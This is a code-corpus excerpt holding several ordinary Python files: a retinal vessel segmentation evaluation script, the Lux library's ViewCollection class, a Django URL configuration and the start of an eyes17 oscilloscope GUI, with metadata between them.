FalseNegatives\nimport tensorflow as tf\nimport tensorflow.keras.backend as K\nfrom tensorflow.keras.utils import plot_model as plot\n\nimport sys\nsys.path.insert(0, './lib/')\nfrom help_functions import *\nfrom loader import load_testset\nfrom extract_patches import recompone\nfrom extract_patches import recompone_overlap\nfrom nn_utils import *\nfrom unet import get_unet\nfrom resnet import UResNet\n\nsession = K.get_session()\n\n#========= CONFIG FILE TO READ FROM =======\nconfig = configparser.RawConfigParser()\nconfig.read('configuration.txt')\n\npath_data = config.get('data paths', 'path_local')\ntest_data_path = config.get('data paths', 'test_data_path')\ntest_data_stats = config.get('data paths', 'test_data_stats')\n\nstats_config = configparser.RawConfigParser()\nstats_config.read(test_data_stats)\nfull_img_height = int(stats_config.get('statistics', 'new_image_height'))\nfull_img_width = int(stats_config.get('statistics', 'new_image_width'))\n\n# dimension of the patches\npatch_size = (int(config.get('data attributes', 'patch_height')), int(config.get('data attributes', 'patch_width')))\n\n#the stride in case output with average\nstride_size = (int(config.get('testing settings', 'stride_height')), int(config.get('testing settings', 'stride_width')))\nassert (stride_size[0] < patch_size[0] and stride_size[1] < patch_size[1])\n\n#model name\nname_experiment = config.get('experiment', 'name')\narch = config.get('experiment', 'arch')\ntestset = config.get('experiment', 'testset')\nexperiment_path = path_data + '/' + name_experiment + '_' + arch\nsave_path = experiment_path + '/' + testset\n\nu_net = arch == 'unet'\n\n#N full images to be predicted\nimgs_to_visualize = int(config.get('testing settings', 'imgs_to_visualize'))\nN_subimgs = int(config.get('testing 
settings', 'N_subimgs'))\npatches_per_img = int(stats_config.get('statistics', 'subimages_per_image'))\n\n#Grouping of the predicted images\nN_visual = int(config.get('testing settings', 'N_group_visual'))\nbatch_size = int(config.get('training settings', 'batch_size'))\n\n\n#================= Load the data =====================================================\ndataset = load_testset(test_data_path, batch_size)\niterator = dataset.make_one_shot_iterator()\n\nn_samples = int(patches_per_img * imgs_to_visualize)\nbatches = int(np.ceil(n_samples / batch_size))\npatches_embedding = np.zeros((batches * batch_size, 1, patch_size[0], patch_size[1]))\npatches_embedding_gt = np.zeros((batches * batch_size, 1, patch_size[0], patch_size[1]))\n\nbatch_img, batch_gt = iterator.get_next()\nprint('loading visualization data')\nfor i in range(batches):\n if i % 50 == 0:\n print(str(i) + ' / ' + str(batches))\n batch_gt_np = tf.reshape(batch_gt[:, 1], (batch_size, 1, patch_size[0], patch_size[1]))\n batch_img_np, batch_gt_np = session.run([batch_img, batch_gt_np])\n patches_embedding[i * batch_size: i * batch_size + batch_size] = batch_img_np\n patches_embedding_gt[i * batch_size: i * batch_size + batch_size] = batch_gt_np\n\npatches_embedding = (patches_embedding[:n_samples] + 3.) / 6.\npatches_embedding_gt = patches_embedding_gt[:n_samples]\n\n\norig_imgs = recompone_overlap(\n patches_embedding,\n full_img_height,\n full_img_width,\n stride_size[0],\n stride_size[1]\n) * 255\ngtruth_masks = recompone_overlap(\n patches_embedding_gt,\n full_img_height,\n full_img_width,\n stride_size[0],\n stride_size[1]\n) * 255\n\n#================ Run the prediction of the patches ==================================\nbest_last = config.get('testing settings', 'best_last')\n\n#Load the saved model\nif u_net:\n model = get_unet(1, batch_size, patch_size[0], patch_size[1], with_activation=True) #the U-net model\nelse:\n model = UResNet(input_shape=(1, patch_size[0], patch_size[1]), with_activation=True)\n\nthresholds = np.linspace(0, 1, 200).tolist()\nmodel.compile(\n optimizer = 'sgd',\n loss = weighted_cross_entropy(9),\n metrics = [\n BinaryAccuracy(),\n TruePositives(thresholds = thresholds),\n FalsePositives(thresholds = thresholds),\n TrueNegatives(thresholds = thresholds),\n FalseNegatives(thresholds = thresholds) # confusion\n ]\n)\nplot(model, to_file = experiment_path + '/' + name_experiment + '_model_test.png') #check how the model looks like\nprint(experiment_path + '/' + name_experiment + '_' + best_last + '_weights.h5')\nmodel.load_weights(experiment_path + '/' + name_experiment + '_' + best_last + '_weights.h5')\n\nprint(\"start prediction\")\n#Calculate the predictions\nsamples_to_predict = np.ceil(patches_per_img * imgs_to_visualize / batch_size) * batch_size\npredictions = model.predict(\n dataset.take(samples_to_predict),\n batch_size = batch_size,\n steps = int(samples_to_predict / batch_size)\n)\n\npredictions = predictions[:patches_per_img * imgs_to_visualize]\n\n#===== Convert the prediction arrays in corresponding images\n\npred_patches = pred_to_imgs(predictions, patch_size[0], patch_size[1], \"original\")\n\n# #========== Elaborate and visualize the predicted images ====================\npred_imgs = recompone_overlap(\n pred_patches,\n full_img_height,\n full_img_width,\n stride_size[0],\n stride_size[1]\n) * 255\n\nassert(np.max(pred_imgs) <= 255)\nassert(np.min(pred_imgs) >= 0)\n\nprint(\"Orig imgs shape: \" +str(orig_imgs.shape))\nprint(\"pred imgs shape: \" 
+str(pred_imgs.shape))\nprint(\"Gtruth imgs shape: \" +str(gtruth_masks.shape))\nvisualize(group_images(orig_imgs, N_visual), save_path + \"_all_originals\")#.show()\nvisualize(group_images(pred_imgs, N_visual), save_path + \"_all_predictions\")#.show()\nvisualize(group_images(gtruth_masks,N_visual), save_path + \"_all_groundTruths\")#.show()\n#visualize results comparing mask and prediction:\nassert(orig_imgs.shape[0]==pred_imgs.shape[0] and orig_imgs.shape[0]==gtruth_masks.shape[0])\nN_predicted = orig_imgs.shape[0]\ngroup = N_visual\nassert (N_predicted % group==0)\nfor i in range(int(N_predicted/group)):\n fr = i * group\n to = i * group + group\n orig_stripe = group_images(orig_imgs[fr: to], group)\n masks_stripe = group_images(gtruth_masks[fr: to], group)\n pred_stripe = group_images(pred_imgs[fr: to], group)\n total_img = np.concatenate((orig_stripe, masks_stripe, pred_stripe), axis=0)\n visualize(total_img, save_path + \"_Original_GroundTruth_Prediction\" + str(i))#.show()\n\n#========================== Evaluate the results ===================================\nprint(\"\\n\\n======== Evaluate the results =======================\")\n\neval_values = model.evaluate(\n dataset,\n batch_size = batch_size,\n steps = int(N_subimgs / batch_size),\n verbose = 1\n)\n\n_, acc, true_positives, false_positives, true_negatives, false_negatives = eval_values\n\n# Area under the ROC curve\ntpr = true_positives / (true_positives + false_negatives)\nfpr = false_positives / (false_positives + true_negatives)\nroc_curve = plt.figure()\nplt.plot(fpr,tpr,'-',label='Area Under the Curve' )\nplt.title('ROC curve')\nplt.xlabel(\"FPR (False Positive Rate)\")\nplt.ylabel(\"TPR (True Positive Rate)\")\nplt.legend(loc = \"lower right\")\nplt.savefig(save_path + \"_ROC.png\")\n\n# Precision-recall curve\n# print(\"\\nArea under Precision-Recall curve: \" +str(AUC_prec_rec))\nprecision = true_positives / (true_positives + false_positives)\nprec_rec_curve = plt.figure()\nplt.plot(tpr, precision, '-', label = 'Area Under the Curve')\nplt.title('Precision - Recall curve')\nplt.xlabel(\"Recall\")\nplt.ylabel(\"Precision\")\nplt.legend(loc = \"lower right\")\nplt.savefig(save_path + \"_Precision_recall.png\")\n\n# Confusion matrix (take threshold of 0.5)\nconfusion = np.array([[true_positives[99], false_positives[99]], [false_negatives[99], true_negatives[99]]])\nconfusion /= np.sum(confusion)\nprint(confusion)\n\nif float(np.sum(confusion))!=0:\n accuracy = float(confusion[0,0]+confusion[1,1])/float(np.sum(confusion))\nprint(\"Global Accuracy: \" +str(accuracy))\nspecificity = 0\nif float(confusion[0,0]+confusion[0,1])!=0:\n specificity = float(confusion[0,0])/float(confusion[0,0]+confusion[0,1])\nprint(\"Specificity: \" +str(specificity))\nsensitivity = 0\nif float(confusion[1,1]+confusion[1,0])!=0:\n sensitivity = float(confusion[1,1])/float(confusion[1,1]+confusion[1,0])\nprint(\"Sensitivity: \" +str(sensitivity))\nprecision = 0\nif float(confusion[1,1]+confusion[0,1])!=0:\n precision = float(confusion[1,1])/float(confusion[1,1]+confusion[0,1])\nprint(\"Precision: \" +str(precision))\n\n#Save the results\nwith open(save_path + '_performances.txt', 'w') as file:\n file.write(\n \"Confusion matrix:\\n\"\n + str(confusion)\n + \"\\nACCURACY: \" + str(accuracy)\n + \"\\nSENSITIVITY: \" + str(sensitivity)\n + \"\\nSPECIFICITY: \" + str(specificity)\n + \"\\nPRECISION: \" + str(precision)\n )\n file.close()\n", "sub_path": "src/retinaNN_predict.py", "file_name": "retinaNN_predict.py", "file_ext": "py", 
"file_size_in_byte": 9224, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.path.insert", "line_number": 23, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.backend.get_session", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 32, "usage_type": "name"}, {"api_name": "configparser.RawConfigParser", "line_number": 35, "usage_type": "call"}, {"api_name": "configparser.RawConfigParser", "line_number": 42, "usage_type": "call"}, {"api_name": "loader.load_testset", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 87, "usage_type": "call"}, {"api_name": "extract_patches.recompone_overlap", "line_number": 96, "usage_type": "call"}, {"api_name": "extract_patches.recompone_overlap", "line_number": 103, "usage_type": "call"}, {"api_name": "unet.get_unet", "line_number": 116, "usage_type": "call"}, {"api_name": "resnet.UResNet", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 120, "usage_type": "call"}, {"api_name": "tensorflow.keras.metrics.BinaryAccuracy", "line_number": 125, "usage_type": "call"}, {"api_name": "tensorflow.keras.metrics.TruePositives", "line_number": 126, "usage_type": "call"}, {"api_name": "tensorflow.keras.metrics.FalsePositives", "line_number": 127, "usage_type": "call"}, {"api_name": "tensorflow.keras.metrics.TrueNegatives", "line_number": 128, "usage_type": "call"}, {"api_name": "tensorflow.keras.metrics.FalseNegatives", "line_number": 129, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.plot_model", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 138, "usage_type": "call"}, {"api_name": "extract_patches.recompone_overlap", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 209, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 210, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 210, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 211, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 212, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 214, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 223, "usage_type": "call"}]} +{"seq_id": "583180592", "text": "from __future__ import annotations\nfrom lux.vizLib.altair.AltairRenderer import AltairRenderer\nfrom lux.utils.utils import check_import_lux_widget\nfrom typing import List, Union, Callable, Dict\nfrom lux.view.View import View\nfrom lux.context.Spec import Spec\nclass ViewCollection():\n\t'''\n\tViewCollection is a list of View objects. \n\t'''\n\tdef __init__(self,input_lst:Union[List[View],List[Spec]]):\n\t\t# Overloaded Constructor\n\t\tself.input_lst = input_lst\n\t\tif len(input_lst)>0:\n\t\t\tif (self._is_view_input()):\n\t\t\t\tself.collection = input_lst\n\t\t\t\tself.spec_lst = []\n\t\t\telse:\n\t\t\t\tself.spec_lst = input_lst\n\t\t\t\tself.collection = []\n\t\telse:\n\t\t\tself.collection = []\n\t\t\tself.spec_lst = []\n\tdef get_exported(self) -> ViewCollection:\n\t\t\"\"\"\n\t\tGet selected views as exported View Collection\n\n\t\tNotes\n -----\n\t\tConvert the _exportedVisIdxs dictionary into a programmable ViewCollection\n\t\tExample _exportedVisIdxs : \n\t\t\t{'View Collection': [0, 2]}\n\t\t\n\t\tReturns\n\t\t-------\n\t\tViewCollection\n\t\t \treturn a ViewCollection of selected views. 
-> ViewCollection(v1, v2...)\n\t\t\"\"\" \n\t\t\n\t\texported_vis_lst =self.widget._exportedVisIdxs\n\t\tif (exported_vis_lst=={}):\n\t\t\timport warnings\n\t\t\twarnings.warn(\"No visualization selected to export\")\n\t\t\treturn []\n\t\telse:\n\t\t\texported_views = ViewCollection(list(map(self.__getitem__, exported_vis_lst[\"View Collection\"])))\n\t\t\treturn exported_views\n\tdef remove_duplicates(self) -> None: \n\t\t\"\"\"\n\t\tRemoves duplicate views in View collection\n\t\t\"\"\"\t\t\n\t\tself.collection = list(set(self.collection))\n\tdef _is_view_input(self):\n\t\tif (type(self.input_lst[0])==View):\n\t\t\treturn True\n\t\telif (type(self.input_lst[0])==Spec):\n\t\t\treturn False\n\tdef __getitem__(self, key):\n\t\treturn self.collection[key]\n\tdef __setitem__(self, key, value):\n\t\tself.collection[key] = value\n\tdef __len__(self):\n\t\treturn len(self.collection)\n\tdef __repr__(self):\n\t\tif len(self.collection) == 0:\n\t\t\treturn str(self.input_lst)\n\t\tx_channel = \"\"\n\t\ty_channel = \"\"\n\t\tlargest_mark = 0\n\t\tlargest_filter = 0\n\t\tfor view in self.collection: #finds longest x attribute among all views\n\t\t\tfilter_spec = None\n\t\t\tfor spec in view.spec_lst:\n\t\t\t\tif spec.value != \"\":\n\t\t\t\t\tfilter_spec = spec\n\n\t\t\t\tif spec.aggregation != \"\":\n\t\t\t\t\tattribute = spec.aggregation.upper() + \"(\" + spec.attribute + \")\"\n\t\t\t\telif spec.bin_size > 0:\n\t\t\t\t\tattribute = \"BIN(\" + spec.attribute + \")\"\n\t\t\t\telse:\n\t\t\t\t\tattribute = spec.attribute\n\n\t\t\t\tif spec.channel == \"x\" and len(x_channel) < len(attribute):\n\t\t\t\t\tx_channel = attribute\n\t\t\t\tif spec.channel == \"y\" and len(y_channel) < len(attribute):\n\t\t\t\t\ty_channel = attribute\n\t\t\tif len(view.mark) > largest_mark:\n\t\t\t\tlargest_mark = len(view.mark)\n\t\t\tif filter_spec and len(str(filter_spec.value)) + len(filter_spec.attribute) > largest_filter:\n\t\t\t\tlargest_filter = len(str(filter_spec.value)) + len(filter_spec.attribute) \n\t\tviews_repr = []\n\t\tlargest_x_length = len(x_channel)\n\t\tlargest_y_length = len(y_channel)\n\t\tfor view in self.collection: #pads the shorter views with spaces before the y attribute\n\t\t\tfilter_spec = None\n\t\t\tx_channel = \"\"\n\t\t\ty_channel = \"\"\n\t\t\tadditional_channels = []\n\t\t\tfor spec in view.spec_lst:\n\t\t\t\tif spec.value != \"\":\n\t\t\t\t\tfilter_spec = spec\n\n\t\t\t\tif spec.aggregation != \"\":\n\t\t\t\t\tattribute = spec.aggregation.upper() + \"(\" + spec.attribute + \")\"\n\t\t\t\telif spec.bin_size > 0:\n\t\t\t\t\tattribute = \"BIN(\" + spec.attribute + \")\"\n\t\t\t\telse:\n\t\t\t\t\tattribute = spec.attribute\n\n\t\t\t\tif spec.channel == \"x\":\n\t\t\t\t\tx_channel = attribute.ljust(largest_x_length)\n\t\t\t\telif spec.channel == \"y\":\n\t\t\t\t\ty_channel = attribute\n\t\t\t\telif spec.channel != \"\":\n\t\t\t\t\tadditional_channels.append([spec.channel, attribute])\n\t\t\tif filter_spec:\n\t\t\t\ty_channel = y_channel.ljust(largest_y_length)\n\t\t\telif largest_filter != 0:\n\t\t\t\ty_channel = y_channel.ljust(largest_y_length + largest_filter + 9)\n\t\t\telse:\n\t\t\t\ty_channel = y_channel.ljust(largest_y_length + largest_filter)\n\t\t\tif x_channel != \"\":\n\t\t\t\tx_channel = \"x: \" + x_channel + \", \"\n\t\t\tif y_channel != \"\":\n\t\t\t\ty_channel = \"y: \" + y_channel\n\t\t\taligned_mark = view.mark.ljust(largest_mark)\n\t\t\tstr_additional_channels = \"\"\n\t\t\tfor channel in additional_channels:\n\t\t\t\tstr_additional_channels += \", \" + channel[0] + \": \" + 
channel[1]\n\t\t\tif filter_spec:\n\t\t\t\taligned_filter = \" -- [\" + filter_spec.attribute + filter_spec.filter_op + str(filter_spec.value) + \"]\"\n\t\t\t\taligned_filter = aligned_filter.ljust(largest_filter + 8)\n\t\t\t\tviews_repr.append(f\" <{aligned_mark} {x_channel}{y_channel}{str_additional_channels}{aligned_filter}>\") \n\t\t\telse:\n\t\t\t\tviews_repr.append(f\" <{aligned_mark} {x_channel}{y_channel}{str_additional_channels}>\") \n\t\treturn '['+',\\n'.join(views_repr)[1:]+']'\n\tdef map(self,function):\n\t\t# generalized way of applying a function to each element\n\t\treturn map(function, self.collection)\n\t\n\tdef get(self,field_name):\n\t\t# Get the value of the field for all objects in the collection\n\t\tdef get_field(d_obj):\n\t\t\tfield_val = getattr(d_obj,field_name)\n\t\t\t# Might want to write catch error if key not in field\n\t\t\treturn field_val\n\t\treturn self.map(get_field)\n\n\tdef set(self,field_name,field_val):\n\t\treturn NotImplemented\n\tdef set_plot_config(self,config_func:Callable):\n\t\t\"\"\"\n\t\tModify plot aesthetic settings to the View Collection\n\t\tCurrently only supported for Altair visualizations\n\n\t\tParameters\n\t\t----------\n\t\tconfig_func : typing.Callable\n\t\t\tA function that takes in an AltairChart (https://altair-viz.github.io/user_guide/generated/toplevel/altair.Chart.html) as input and returns an AltairChart as output\n\t\t\"\"\"\n\t\tfor view in self.collection:\n\t\t\tview.plot_config = config_func\n\tdef clear_plot_config(self):\n\t\tfor view in self.collection:\n\t\t\tview.plot_config = None\n\tdef sort(self, remove_invalid=True, descending = True):\n\t\t# remove the items that have invalid (-1) score\n\t\tif (remove_invalid): self.collection = list(filter(lambda x: x.score!=-1,self.collection))\n\t\t# sort in-place by “score” by default if available, otherwise user-specified field to sort by\n\t\tself.collection.sort(key=lambda x: x.score, reverse=descending)\n\n\tdef topK(self,k):\n\t\t#sort and truncate list to first K items\n\t\tself.sort(remove_invalid=True)\n\t\treturn ViewCollection(self.collection[:k])\n\tdef bottomK(self,k):\n\t\t#sort and truncate list to first K items\n\t\tself.sort(descending=False,remove_invalid=True)\n\t\treturn ViewCollection(self.collection[:k])\n\tdef normalize_score(self, invert_order = False):\n\t\tmax_score = max(list(self.get(\"score\")))\n\t\tfor dobj in self.collection:\n\t\t\tdobj.score = dobj.score/max_score\n\t\t\tif (invert_order): dobj.score = 1 - dobj.score\n\tdef _repr_html_(self):\n\t\tself.widget = None\n\t\tfrom IPython.display import display\n\t\tfrom lux.luxDataFrame.LuxDataframe import LuxDataFrame\n\t\t# widget = LuxDataFrame.render_widget(input_current_view=self,render_target=\"viewCollectionOnly\")\n\t\trecommendation = {\"action\": \"View Collection\",\n\t\t\t\t\t \"description\": \"Shows a view collection defined by the context\"}\n\t\trecommendation[\"collection\"] = self\n\n\t\tcheck_import_lux_widget()\n\t\timport luxWidget\n\t\trecJSON = LuxDataFrame.rec_to_JSON([recommendation])\n\t\tself.widget = luxWidget.LuxWidget(\n\t\t\t\tcurrentView={},\n\t\t\t\trecommendations=recJSON,\n\t\t\t\tcontext={}\n\t\t\t)\n\t\tdisplay(self.widget)\t\n\t\n\tdef load(self, ldf) -> ViewCollection:\n\t\t\"\"\"\n\t\tLoading the data into the views in the ViewCollection by instantiating the specification and populating the view based on the data, effectively \"materializing\" the view.\n\n\t\tParameters\n\t\t----------\n\t\tldf : LuxDataframe\n\t\t\tInput Dataframe to be attached to the ViewCollection\n\n\t\tReturns\n\t\t-------\n\t\tViewCollection\n\t\t\tComplete ViewCollection with fully-specified fields\n
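\t\t\n\t\tExample\n\t\t-------\n\t\tA minimal usage sketch (assuming spec_lst is a list of Spec objects and ldf is a LuxDataframe)::\n\n\t\t\tvc = ViewCollection(spec_lst)\n\t\t\tvc = vc.load(ldf) # views in vc are now populated with data from ldf\n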
\t\t\n\t\tSee Also\n\t\t--------\n\t\tlux.view.View.load\n\t\t\"\"\"\t\t\n\t\tfrom lux.compiler.Parser import Parser\n\t\tfrom lux.compiler.Validator import Validator\n\t\tfrom lux.compiler.Compiler import Compiler\n\t\tfrom lux.executor.PandasExecutor import PandasExecutor #TODO: temporary (generalize to executor)\n\t\tif len(self.input_lst)>0:\n\t\t\tif (self._is_view_input()):\n\t\t\t\tfor view in self.collection:\n\t\t\t\t\tview.spec_lst = Parser.parse(view.spec_lst)\n\t\t\t\t\tValidator.validate_spec(view.spec_lst,ldf)\n\t\t\t\tvc = Compiler.compile(ldf,ldf.context,self,enumerate_collection=False)\n\t\t\telse:\n\t\t\t\tself.spec_lst = Parser.parse(self.spec_lst)\n\t\t\t\tValidator.validate_spec(self.spec_lst,ldf)\n\t\t\t\tvc = Compiler.compile(ldf,self.spec_lst,self)\n\t\t\tPandasExecutor.execute(vc,ldf)\n\t\t\treturn vc\n\t\telse:\n\t\t\treturn self\n", "sub_path": "lux/view/ViewCollection.py", "file_name": "ViewCollection.py", "file_ext": "py", "file_size_in_byte": 8385, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "typing.Union", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 11, "usage_type": "name"}, {"api_name": "lux.view.View.View", "line_number": 11, "usage_type": "name"}, {"api_name": "lux.context.Spec.Spec", "line_number": 11, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 43, "usage_type": "call"}, {"api_name": "lux.view.View.View", "line_number": 54, "usage_type": "name"}, {"api_name": "lux.context.Spec.Spec", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 152, "usage_type": "name"}, {"api_name": "lux.utils.utils.check_import_lux_widget", "line_number": 195, "usage_type": "call"}, {"api_name": "lux.luxDataFrame.LuxDataframe.LuxDataFrame.rec_to_JSON", "line_number": 197, "usage_type": "call"}, {"api_name": "lux.luxDataFrame.LuxDataframe.LuxDataFrame", "line_number": 197, "usage_type": "name"}, {"api_name": "luxWidget.LuxWidget", "line_number": 198, "usage_type": "call"}, {"api_name": "IPython.display.display", "line_number": 203, "usage_type": "call"}, {"api_name": "lux.compiler.Parser.Parser.parse", "line_number": 237, "usage_type": "call"}, {"api_name": "lux.compiler.Parser.Parser", "line_number": 237, "usage_type": "name"}, {"api_name": "lux.compiler.Validator.Validator.validate_spec", "line_number": 238, "usage_type": "call"}, {"api_name": "lux.compiler.Validator.Validator", "line_number": 238, "usage_type": "name"}, {"api_name": "lux.compiler.Compiler.Compiler.compile", "line_number": 239, "usage_type": "call"}, {"api_name": "lux.compiler.Compiler.Compiler", "line_number": 239, "usage_type": "name"}, {"api_name": "lux.compiler.Parser.Parser.parse", "line_number": 241, "usage_type": "call"}, {"api_name": "lux.compiler.Parser.Parser", "line_number": 241, "usage_type": "name"}, {"api_name": "lux.compiler.Validator.Validator.validate_spec", "line_number": 242, "usage_type": "call"}, {"api_name": "lux.compiler.Validator.Validator", "line_number": 242, "usage_type": "name"}, {"api_name": "lux.compiler.Compiler.Compiler.compile", "line_number": 243, "usage_type": "call"}, {"api_name": "lux.compiler.Compiler.Compiler", "line_number": 243, "usage_type": "name"}, {"api_name": "lux.executor.PandasExecutor.PandasExecutor.execute", "line_number": 244, "usage_type": "call"}, {"api_name": "lux.executor.PandasExecutor.PandasExecutor", "line_number": 244, "usage_type": "name"}]} +{"seq_id": "518393632", "text": "from 
django.conf.urls import patterns, url\n\n# Everything is AJAX\nurlpatterns = patterns('forum_tools.views',\n\turl(r'^get_sync_data/$', 'get_sync_data'),\n\turl(r'^get_chat/$', 'get_chat'),\n url(r'^get_post_perm/$', 'get_posting_level'),\n url(r'^get_build_report_forums/$', 'get_build_report_forums'),\n\turl(r'^mods/get_data/$', 'get_mod_data'),\n url(r'^mods/get_sharing_perms/$', 'get_sharing_perms'),\n)\n", "sub_path": "forum_tools/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 419, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 4, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "393737293", "text": "# -*- coding: utf-8; mode: python; indent-tabs-mode: t; tab-width:4 -*-\nimport sys, time, math, os.path\n\nfrom QtVersion import *\n\nimport sys, time, utils\nimport pyqtgraph as pg\nimport numpy as np\nimport eyes17.eyemath17 as em\nfrom functools import partial\n\n\nclass Expt(QWidget):\n\tTIMER = 50\n\tloopCounter = 0\n\tAWGmin = 1\n\tAWGmax = 5000\n\tAWGval = 1000\n\tSQ1min = 0\n\tSQ1max = 5000\n\tSQ1val = 0\n\tPV1min = -5.0\n\tPV1max = 5.0\n\tPV1val = 0.0\n\tPV2min = -3.3\n\tPV2max = 3.3\n\tPV2val = 0.0\n\tWaves = ['sine', 'tria', 'SQR2']\n\tWgains = ['80 mV', '1V', '3V']\n\twaveindex = 0\n\twgainindex = 2\n\t\n\tRPVspacing = 3\t\t\t\t\t\t\t\t\t\t\t# Right panel Widget spacing\n\tRPWIDTH = 300\n\tLABW = 60\n\t\t\n\t# Scope parameters\n\tMAXCHAN = 4\n\tRanges12 = ['16 V', '8 V','4 V', '2.5 V', '1 V', '.5V']\t# Voltage ranges for A1 and A2\n\tRangeVals12 = [16., 8., 4., 2.5, 1., 0.5]\n\tRanges34 = ['4 V', '2 V', '1 V', '.5V']\t\t\t\t\t# Voltage ranges for A3 and MIC\n\tRangeVals34 = [4,2,1,0.5]\n\tchanStatus = [1,0,0,0]\n\ttimeData = [None]*4\n\tvoltData = [None]*4\n\tvoltDataFit = [None]*4\n\ttraceWidget = [None]*4\n\toffSliders = [None]*4\n\toffValues = [0] * 4\n\tDiffTraceW = None\n\tfitResWidget= [None]*4\n\tchanSelCB = [None]*4\n\trangeSelPB = [None]*4\n\tfitSelCB = [None]*4\n\tfitResLab = [None]*4\n\tfitFlags = [0]*4\n\tAmplitude = [0]*4\n\tFrequency = [0]*4\n\tPhase = [0]*4\n\trangeVals = [4]*4\t\t# selected value of range\n\trangeTexts = ['4 V']*4\t\t# selected value of range\n\tscaleLabs = [None]*4 # display fullscale value inside pg\n\tvoltMeters = [None]*3\n\tvoltMeterCB = [None]*3\n\tvalueLabel = None\n\t\n\tsources = ['A1','A2','A3', 'MIC']\t\n\n\ttbvals = [0.100, 0.200, 0.500, 1.0, 2.0, 5.0, 10.0, 20.0, 50.0]\t# allowed mS/div values\n\tNP = 500\t\t\t# Number of samples\n\tTG = 1\t\t\t\t# Time gap between samples, in usecs\n\tMINDEL = 1\t\t\t# minimum time between samples, in usecs\n\tMAXDEL = 1000\n\tdelay = MINDEL\t\t# Time interval between samples\n\tTBval = 1\t\t\t# timebase list index\n\tTrigindex = 0\n\tTriglevel = 0\n\tdutyCycle = 50\n\tMAXRES = 5\n\tresLabs = [None]*MAXRES\n\tResults = [None]*MAXRES\n\n\t\t\n\n\tdef recover(self):\t\t# Recover the settings before it got 
